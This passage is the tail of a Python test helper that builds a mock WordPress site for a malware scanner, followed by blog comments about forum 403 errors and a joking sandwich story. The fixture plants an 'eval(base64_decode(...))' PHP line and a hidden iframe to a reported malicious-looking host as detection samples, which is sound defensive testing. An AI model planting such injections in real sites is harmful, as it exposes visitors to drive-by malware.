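    """Constructed stand-in for a downloaded site (hypothetical paths and contents)."""
    root = tempfile.mkdtemp(prefix="site_")
    os.makedirs(os.path.join(root, "wp-content", "themes", "demo"))
    samples = {
        "index.php": "<?php\n// clean file, nothing to flag\necho 'hello';\n",
        "wp-content/themes/demo/footer.php":
            "<?php eval(base64_decode('aGVsbG8=')); ?>\n"
            "<iframe src=\"http://qwe.systemsviensows.asia/x\"></iframe>\n",
        # Skipped by the extension filter even though it contains a reported host
        "wp-content/uploads.bin": "qwe.arteriosclerosisobliteranas.net\n",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for hit in scan_tree(build_sample_site()):
        print("%s:%d [%s] %s" % hit)
```

Hits come back as structured tuples so they can be sorted by file or fed into a diff against a known-clean copy of the theme.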
On a somewhat related note: today, all of a sudden, whenever I try to visit the Twenty Sided forums I keep getting: 403 Forbidden
“You don’t have permission to access /forums/index.php on this server.”
I’m getting “You don’t have permission to access / on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.”
Also, the “check this box if you are not a spammer” box appears to be gone, just in case that wasn’t deliberate.
Huh, the full message for me is:
“You don’t have permission to access /forums/viewforum.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”
Seconded. Never rains but it pours, eh Shamus?
Ditto for me regarding the forums. I haven’t had any of the issues Shamus mentions in his blog though.
Also the “Check this box if you aren’t a spammer” seems to be missing as I post this. It hasn’t been absent before.
I should probably get around to installing an antivirus program, it’s been 2 years now with this PC, or so…
Nooo! You’ve killed the edit function!
I hope your site is O.K. and a solution is found expediently, Shamus.
Also, fucking love the community coming together to try and figure it out. Only wish I knew more and could help, but alas.
I can say though that using Firefox I have YET to encounter any issues like this with your site.
Shamus, I dunno the first thing about fixing a website, but DO NOT make light of serious issues to prove your point. Incendiary PB&Js are a real and true threat, one that affects many people and has left many children weeping for their squandered lunch.
Just last week I settled down to a nice meal consisting of a homemade peanut butter and jelly sandwich, a TWIX bar, an orange soda, and a bag of kettle chips. As I opened up my sandwich container, I was expecting to find two pieces of soft, succulent bread smothered with liberal heaps of peanut butter and a conservative amount of jelly. But all I found was a pile of ashes, a faint whiff of smoke and kerosene, and an empty stomach full of disappointment. At least I still had the rest of the stuff, so I was in no danger of starvation, but I had to suffer the rest of my day deprived of my beloved culinary darling. I rushed home as soon as my day was over, and made myself another sandwich to stave off my sense of longing.
Which then caught fire, almost as if to taunt me.
This is a real problem, Shamus Young. Just because you don’t see results in Google search does not mean that it never happens. It happens every day. Every hour. Every meal. Every time I sit down to enjoy my favorite food.
I do not know why my beloved peanut butter and jelly has forsaken me so. But I will find out, and no amount of lackluster Google search results, common sense, or soft-spoken psychiatrists will stop me from rooting out the truth!
(…am I doing this sarcasm thing right?)